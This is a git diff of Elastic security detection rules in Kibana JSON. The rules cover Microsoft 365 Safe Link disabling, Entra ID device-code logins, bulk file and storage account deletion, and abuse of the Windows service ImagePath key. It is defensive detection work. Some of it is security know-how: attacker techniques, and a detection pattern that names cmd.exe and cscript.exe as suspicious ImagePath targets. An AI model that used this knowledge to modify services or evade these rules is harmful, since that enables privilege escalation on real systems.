"subtechnique": [ + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207.json deleted file mode 100644 index 7c9619d0e4c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", - "false_positives": [ - "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Safe Link Policy Disabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Safe Link Policy Disabled\n\nMicrosoft 365's Safe Link policies enhance security by scanning hyperlinks in documents for phishing threats, even post-delivery. Disabling these policies can expose users to phishing attacks. Adversaries might exploit this by disabling Safe Links to facilitate malicious link delivery. The detection rule identifies successful attempts to disable Safe Link policies, signaling potential security breaches.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event.dataset:o365.audit and event.provider:Exchange to confirm the occurrence of the \"Disable-SafeLinksRule\" action with a successful outcome.\n- Identify the user account associated with the event.action:\"Disable-SafeLinksRule\" to determine if the action was performed by an authorized individual or if the account may have been compromised.\n- Check the recent activity of the identified user account for any unusual or unauthorized actions that could indicate a broader security incident.\n- Investigate any recent changes to Safe Link policies in the Microsoft 365 environment to understand the scope and impact of the policy being disabled.\n- Assess whether there have been any recent phishing attempts or suspicious emails delivered to users, which could exploit the disabled Safe Link policy.\n- Coordinate with the IT security team to re-enable the Safe Link policy and implement additional monitoring to prevent future unauthorized changes.\n\n### False positive analysis\n\n- Administrative changes: Legitimate administrative actions may involve disabling Safe Link policies temporarily for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Third-party integrations: Some third-party security tools or integrations might require Safe Link policies to be disabled for compatibility reasons. Identify and document these tools, and set up exceptions for their associated actions.\n- Policy updates: During policy updates or migrations, Safe Link policies might be disabled as part of the process. Monitor and document these events, and exclude them from alerts if they match known update patterns.\n- User training sessions: Safe Link policies might be disabled during user training or demonstrations to showcase potential threats. Schedule these sessions and exclude related activities from triggering alerts.\n\n### Response and remediation\n\n- Immediately re-enable the Safe Link policy in Microsoft 365 to restore phishing protection for hyperlinks in documents.\n- Conduct a thorough review of recent email and document deliveries to identify any potentially malicious links that may have been delivered while the Safe Link policy was disabled.\n- Isolate any identified malicious links or documents and notify affected users to prevent interaction with these threats.\n- Investigate the account or process that disabled the Safe Link policy to determine if it was compromised or misused, and take appropriate actions such as password resets or privilege revocation.\n- Escalate the incident to the security operations team for further analysis and to determine if additional security measures are needed to prevent similar incidents.\n- Implement additional monitoring and alerting for changes to Safe Link policies to ensure rapid detection of any future unauthorized modifications.\n- Review and update access controls and permissions related to Safe Link policy management to ensure only authorized personnel can make changes.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json b/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json index 246bee4530a..63263e87086 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json +++ b/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json @@ -19,6 +19,13 @@ "https://www.gem.security/post/cloud-ransomware-a-new-take-on-an-old-attack-pattern/", "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 47, "rule_id": "ab8f074c-5565-4bc4-991c-d49770e19fc9", "setup": "AWS S3 data event types need to be enabled in the CloudTrail trail configuration.", diff --git a/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_3.json b/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_3.json deleted file mode 100644 index bfa68af6e1f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_3.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Matteo Potito Giorgio" - ], - "description": "Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure.signinlogs-*", - "logs-azure.activitylogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "First Occurrence of Entra ID Auth via DeviceCode Protocol", - "new_terms_fields": [ - "azure.signinlogs.properties.user_principal_name" - ], - "note": "## Triage and analysis\n\n## Triage and Analysis\n\n### Investigating First Occurrence of Entra ID Auth via DeviceCode Protocol\n\nThis rule detects the first instance of a user authenticating via the **DeviceCode** authentication protocol within a **14-day window**. The **DeviceCode** authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access.\n\n### Possible Investigation Steps\n\n#### Identify the User and Authentication Details\n- **User Principal Name (UPN)**: Review `azure.signinlogs.properties.user_principal_name` to identify the user involved in the authentication event.\n- **User ID**: Check `azure.signinlogs.properties.user_id` for a unique identifier of the affected account.\n- **Authentication Protocol**: Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`.\n- **Application Used**: Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is an expected application.\n\n#### Review the Source IP and Geolocation\n- **Source IP Address**: Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted or expected location.\n- **Geolocation Details**: Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious.\n- **ASN / ISP Details**: Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider.\n\n#### Examine Multi-Factor Authentication (MFA) and Conditional Access\n- **MFA Enforcement**: Review `azure.signinlogs.properties.applied_conditional_access_policies` to determine if MFA was enforced during the authentication.\n- **Conditional Access Policies**: Check `azure.signinlogs.properties.conditional_access_status` to understand if conditional access policies were applied and if any controls were bypassed.\n- **Authentication Method**: Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied (e.g., MFA via claim in token).\n\n#### Validate Device and Client Details\n- **Device Information**: Review `azure.signinlogs.properties.device_detail.browser` to determine if the login aligns with the expected behavior of a device that lacks a keyboard.\n- **User-Agent Analysis**: Inspect `user_agent.original` for anomalies, such as an unexpected operating system or browser.\n- **Client Application**: Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client.\n\n#### Investigate Related Activities\n- **Correlate with Phishing Attempts**: Check if the user recently reported phishing attempts or suspicious emails.\n- **Monitor for Anomalous Account Activity**: Look for recent changes in the user's account settings, including password resets, role changes, or delegation of access.\n- **Check for Additional DeviceCode Logins**: Review if other users in the environment have triggered similar authentication events within the same timeframe.\n\n## False Positive Analysis\n\n- **Legitimate Device Enrollment**: If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected.\n- **Automation or Scripting**: Some legitimate applications or scripts may leverage the `DeviceCode` authentication protocol for non-interactive logins.\n- **Shared Devices in Organizations**: In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts.\n- **Travel and Remote Work**: If the user is traveling or accessing from a new location, confirm legitimacy before taking action.\n\n## Response and Remediation\n\n- **Revoke Suspicious Access Tokens**: Immediately revoke any access tokens associated with this authentication event.\n- **Investigate the User\u2019s Recent Activity**: Review additional authentication logs, application access, and recent permission changes for signs of compromise.\n- **Reset Credentials and Enforce Stronger Authentication**:\n - Reset the affected user\u2019s credentials.\n - Enforce stricter MFA policies for sensitive accounts.\n - Restrict `DeviceCode` authentication to only required applications.\n- **Monitor for Further Anomalies**:\n - Enable additional logging and anomaly detection for DeviceCode logins.\n - Set up alerts for unauthorized access attempts using this authentication method.\n- **Educate Users on Phishing Risks**: If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts.\n- **Review and Adjust Conditional Access Policies**:\n - Limit `DeviceCode` authentication to approved users and applications.\n - Implement stricter geolocation-based authentication restrictions.\n", - "query": "event.dataset:(azure.activitylogs or azure.signinlogs)\n and (\n azure.signinlogs.properties.authentication_protocol:deviceCode or\n azure.signinlogs.properties.original_transfer_method: \"Device code flow\" or\n azure.activitylogs.properties.authentication_protocol:deviceCode\n )\n and event.outcome:success\n", - "references": [ - "https://aadinternals.com/post/phishing/", - "https://www.blackhillsinfosec.com/dynamic-device-code-phishing/", - "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/", - "https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.properties.authentication_protocol", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.authentication_protocol", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.original_transfer_method", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "af22d970-7106-45b4-b5e3-460d15333727", - "setup": "This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected.\n", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 3 - }, - "id": "af22d970-7106-45b4-b5e3-460d15333727_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_207.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_207.json deleted file mode 100644 index eed020f573e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", - "false_positives": [ - "Users or System Administrator cleaning out folders." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Unusual Volume of File Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Unusual Volume of File Deletion\n\nMicrosoft 365's cloud environment facilitates file storage and collaboration, but its vast data handling capabilities can be exploited by adversaries for data destruction. Attackers may delete large volumes of files to disrupt operations or cover their tracks. The detection rule leverages audit logs to identify anomalies in file deletion activities, flagging successful, unusual deletion volumes as potential security incidents, thus enabling timely investigation and response.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific user associated with the alert to confirm the volume and context of the file deletions, focusing on entries with event.action:\"Unusual volume of file deletion\" and event.outcome:success.\n- Correlate the timestamps of the deletion events with other activities in the user's account to identify any suspicious patterns or anomalies, such as unusual login locations or times.\n- Check for any recent changes in user permissions or roles that might explain the ability to delete a large volume of files, ensuring these align with the user's typical responsibilities.\n- Investigate any recent security alerts or incidents involving the same user or related accounts to determine if this activity is part of a broader attack or compromise.\n- Contact the user or their manager to verify if the deletions were intentional and authorized, and gather any additional context that might explain the activity.\n- Assess the impact of the deletions on business operations and data integrity, and determine if any recovery actions are necessary to restore critical files.\n\n### False positive analysis\n\n- High-volume legitimate deletions during data migration or cleanup projects can trigger false positives. To manage this, create exceptions for users or groups involved in these activities during the specified time frame.\n- Automated processes or scripts that perform bulk deletions as part of routine maintenance may be flagged. Identify these processes and whitelist them to prevent unnecessary alerts.\n- Users with roles in data management or IT support may regularly delete large volumes of files as part of their job responsibilities. Establish a baseline for these users and adjust the detection thresholds accordingly.\n- Temporary spikes in file deletions due to organizational changes, such as department restructuring, can be mistaken for malicious activity. Monitor these events and temporarily adjust the rule parameters to accommodate expected changes.\n- Regularly review and update the list of exceptions to ensure that only legitimate activities are excluded from alerts, maintaining the effectiveness of the detection rule.\n\n### Response and remediation\n\n- Immediately isolate the affected user account to prevent further unauthorized file deletions. This can be done by disabling the account or changing the password.\n- Review the audit logs to identify the scope of the deletion and determine if any critical or sensitive files were affected. Restore these files from backups if available.\n- Conduct a thorough review of the affected user's recent activities to identify any other suspicious actions or potential indicators of compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if the deletion is part of a larger attack or breach.\n- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further unusual activities.\n- Review and update access controls and permissions to ensure that users have the minimum necessary access to perform their job functions, reducing the risk of large-scale deletions.\n- Coordinate with the IT and security teams to conduct a post-incident review, identifying any gaps in the response process and implementing improvements to prevent recurrence.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "b2951150-658f-4a60-832f-a00d1e6c6745_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1.json b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1.json new file mode 100644 index 00000000000..3835157fde5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a single user or service principal deletes multiple Azure Storage Accounts within a short time period. This behavior may indicate an adversary attempting to cause widespread service disruption, destroy evidence, or execute a destructive attack such as ransomware. Mass deletion of storage accounts can have severe business impact and is rarely performed by legitimate administrators except during controlled decommissioning activities.", + "false_positives": [ + "Infrastructure teams may legitimately delete multiple storage accounts during planned decommissioning, resource cleanup, or large-scale infrastructure optimization. Verify that the deletion activity was expected and follows organizational change management processes. Consider exceptions for approved maintenance windows or automation service principals." + ], + "from": "now-9m", + "index": [ + "logs-azure.activitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Storage Account Deletions by User", + "note": "## Triage and analysis\n\n### Investigating Azure Storage Account Deletions by User\n\nAzure Storage Accounts are critical infrastructure components that store application data, backups, and business-critical information. Mass deletion of storage accounts is an unusual and high-impact activity that can result in significant data loss and service disruption. Adversaries may perform bulk deletions to destroy evidence after data exfiltration, cause denial of service, or as part of ransomware campaigns targeting cloud infrastructure. This detection identifies when a single identity deletes multiple storage accounts in a short timeframe, which is indicative of potentially malicious activity.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal that initiated the multiple storage account deletions by examining the principal ID, UPN and user agent fields in `azure.activitylogs.identity.claims_initiated_by_user.name`.\n- Check the specific storage account names in `azure.resource.name` to understand which storage resources were deleted and assess the overall business impact.\n- Investigate the timing and sequence of deletions to determine if they followed a pattern consistent with automated malicious activity or manual destruction.\n- Examine the user's recent activity history including authentication events, privilege changes, and other Azure resource modifications to identify signs of account compromise.\n- Verify if the storage account deletions align with approved change requests, maintenance windows, or decommissioning activities in your organization.\n- Check if the deleted storage accounts contained critical data and whether backups are available for recovery.\n- Review any related alerts or activities such as data exfiltration, unusual authentication patterns, or privilege escalation that occurred before the deletions.\n- Investigate if other Azure resources (VMs, databases, resource groups) were also deleted or modified by the same principal.\n- Check the authentication source and location to identify if the activity originated from an expected network location or potentially compromised session.\n\n### False positive analysis\n\n- Legitimate bulk decommissioning of storage accounts during infrastructure cleanup may trigger this alert. Document approved resource cleanup activities and coordinate with infrastructure teams to create exceptions during planned maintenance windows.\n- Infrastructure-as-Code (IaC) automation tools or CI/CD pipelines may delete multiple test or temporary storage accounts. Identify service principals used by automation tools and consider creating exceptions for these identities when operating in non-production environments.\n- Cloud resource optimization initiatives may involve bulk deletion of unused storage accounts. Coordinate with finance and infrastructure teams to understand planned cost optimization activities and schedule them during documented maintenance windows.\n- Disaster recovery testing or blue-green deployment strategies may involve deletion of multiple storage accounts. Work with DevOps teams to identify these patterns and create time-based exceptions during testing periods.\n\n### Response and remediation\n\n- Immediately investigate whether the deletions were authorized by verifying with the account owner or relevant stakeholders.\n- If the deletions were unauthorized, disable the compromised user account or service principal immediately to prevent further damage.\n- Attempt to recover deleted storage accounts if soft-delete is enabled, or restore data from backups for critical storage accounts.\n- Review and audit all Azure RBAC permissions to identify how the attacker gained storage account deletion capabilities (requires Contributor or Owner role).\n- Conduct a full security assessment to identify the initial access vector and any other compromised accounts or resources.\n- Implement Azure Resource Locks on all critical storage accounts to prevent accidental or malicious deletion.\n- Configure Azure Policy to require approval workflows for storage account deletions using Azure Blueprints or custom governance solutions.\n- Enable Azure Activity Log alerts to notify security teams immediately when storage accounts are deleted.\n- Escalate the incident to the security operations center (SOC) or incident response team for investigation of potential broader compromise.\n- Document the incident and update security policies, playbooks, and procedures to prevent similar incidents in the future.\n", + "query": "event.dataset: azure.activitylogs and\n azure.activitylogs.operation_name: \"MICROSOFT.STORAGE/STORAGEACCOUNTS/DELETE\" and\n azure.activitylogs.identity.claims_initiated_by_user.name: *\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.identity.claims_initiated_by_user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + }, + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "azure.resource.name", + "value": 5 + } + ], + "field": [ + "azure.activitylogs.identity.claims_initiated_by_user.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 1 + }, + "id": "b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107.json b/packages/security_detection_engine/kibana/security_rule/b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107.json new file mode 100644 index 00000000000..4871dcdd135 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107.json @@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modifications to default services that could enable privilege escalation to SYSTEM. Attackers with privileges from groups like Server Operators may change the ImagePath of services to executables under their control or to execute commands.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*", + "logs-m365_defender.event-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Service ImagePath Modification", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Privilege Escalation via Service ImagePath Modification\n\nWindows services are crucial for system operations, often running with high privileges. Adversaries exploit this by altering the ImagePath registry key of services to execute malicious code with elevated privileges. The detection rule identifies suspicious modifications to service ImagePaths, focusing on changes that deviate from standard executable paths, thus flagging potential privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the specific registry key and value that triggered the alert to confirm it matches one of the monitored service keys, such as those listed in the query (e.g., *\\LanmanServer, *\\Winmgmt).\n- Examine the modified ImagePath value to determine if it points to a non-standard executable path or a suspicious executable, especially those not located in %systemroot%\\system32\\.\n- Check the process.executable field to identify the process responsible for the registry modification and assess its legitimacy.\n- Investigate the user account associated with the modification event to determine if it has elevated privileges, such as membership in the Server Operators group.\n- Correlate the event with other logs or alerts to identify any related suspicious activities, such as unexpected service starts or process executions.\n- Review recent changes or activities on the host to identify any unauthorized access or configuration changes that could indicate a broader compromise.\n\n### False positive analysis\n\n- Legitimate software updates or installations may modify service ImagePaths. Users can create exceptions for known update processes or installation paths to prevent false positives.\n- System administrators might intentionally change service configurations for maintenance or troubleshooting. Document and exclude these changes by adding exceptions for specific administrator actions or paths.\n- Custom scripts or automation tools that modify service settings as part of their operation can trigger alerts. Identify and whitelist these scripts or tools to avoid unnecessary alerts.\n- Some third-party security or management software may alter service ImagePaths as part of their functionality. Verify the legitimacy of such software and exclude their known paths from detection.\n- Changes made by trusted IT personnel during system configuration or optimization should be logged and excluded from alerts to reduce noise.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement.\n- Terminate any suspicious processes identified as running from non-standard executable paths, especially those not originating from the system32 directory.\n- Restore the modified ImagePath registry key to its original state using a known good configuration or backup.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any additional malicious files or persistence mechanisms.\n- Review and audit user accounts and group memberships, particularly those with elevated privileges like Server Operators, to ensure no unauthorized changes have been made.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and alerting for future modifications to service ImagePath registry keys, focusing on deviations from standard paths to detect similar threats promptly.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and process.executable != null and\n registry.data.strings != null and registry.value == \"ImagePath\" and\n registry.key : (\n \"*\\\\ADWS\", \"*\\\\AppHostSvc\", \"*\\\\AppReadiness\", \"*\\\\AudioEndpointBuilder\", \"*\\\\AxInstSV\", \"*\\\\camsvc\", \"*\\\\CertSvc\",\n \"*\\\\COMSysApp\", \"*\\\\CscService\", \"*\\\\defragsvc\", \"*\\\\DeviceAssociationService\", \"*\\\\DeviceInstall\", \"*\\\\DevQueryBroker\",\n \"*\\\\Dfs\", \"*\\\\DFSR\", \"*\\\\diagnosticshub.standardcollector.service\", \"*\\\\DiagTrack\", \"*\\\\DmEnrollmentSvc\", \"*\\\\DNS\",\n \"*\\\\dot3svc\", \"*\\\\Eaphost\", \"*\\\\GraphicsPerfSvc\", \"*\\\\hidserv\", \"*\\\\HvHost\", \"*\\\\IISADMIN\", \"*\\\\IKEEXT\",\n \"*\\\\InstallService\", \"*\\\\iphlpsvc\", \"*\\\\IsmServ\", \"*\\\\LanmanServer\", \"*\\\\MSiSCSI\", \"*\\\\NcbService\", \"*\\\\Netlogon\",\n \"*\\\\Netman\", \"*\\\\NtFrs\", \"*\\\\PlugPlay\", \"*\\\\Power\", \"*\\\\PrintNotify\", \"*\\\\ProfSvc\", \"*\\\\PushToInstall\", \"*\\\\RSoPProv\",\n \"*\\\\sacsvr\", \"*\\\\SENS\", \"*\\\\SensorDataService\", \"*\\\\SgrmBroker\", \"*\\\\ShellHWDetection\", \"*\\\\shpamsvc\", \"*\\\\StorSvc\",\n \"*\\\\svsvc\", \"*\\\\swprv\", \"*\\\\SysMain\", \"*\\\\Themes\", \"*\\\\TieringEngineService\", \"*\\\\TokenBroker\", \"*\\\\TrkWks\",\n \"*\\\\UALSVC\", \"*\\\\UserManager\", \"*\\\\vm3dservice\", \"*\\\\vmicguestinterface\", \"*\\\\vmicheartbeat\", \"*\\\\vmickvpexchange\",\n \"*\\\\vmicrdv\", \"*\\\\vmicshutdown\", \"*\\\\vmicvmsession\", \"*\\\\vmicvss\", \"*\\\\vmvss\", \"*\\\\VSS\", \"*\\\\w3logsvc\", \"*\\\\W3SVC\",\n \"*\\\\WalletService\", \"*\\\\WAS\", \"*\\\\wercplsupport\", \"*\\\\WerSvc\", \"*\\\\Winmgmt\", \"*\\\\wisvc\", \"*\\\\wmiApSrv\",\n \"*\\\\WPDBusEnum\", \"*\\\\WSearch\"\n ) and\n not (\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\*.exe\",\n \"%systemroot%\\\\system32\\\\*.exe\",\n \"%windir%\\\\system32\\\\*.exe\",\n \"%SystemRoot%\\\\system32\\\\svchost.exe -k *\",\n \"%windir%\\\\system32\\\\svchost.exe -k *\"\n ) and\n not registry.data.strings : (\n \"*\\\\cmd.exe\",\n \"*\\\\cscript.exe\",\n 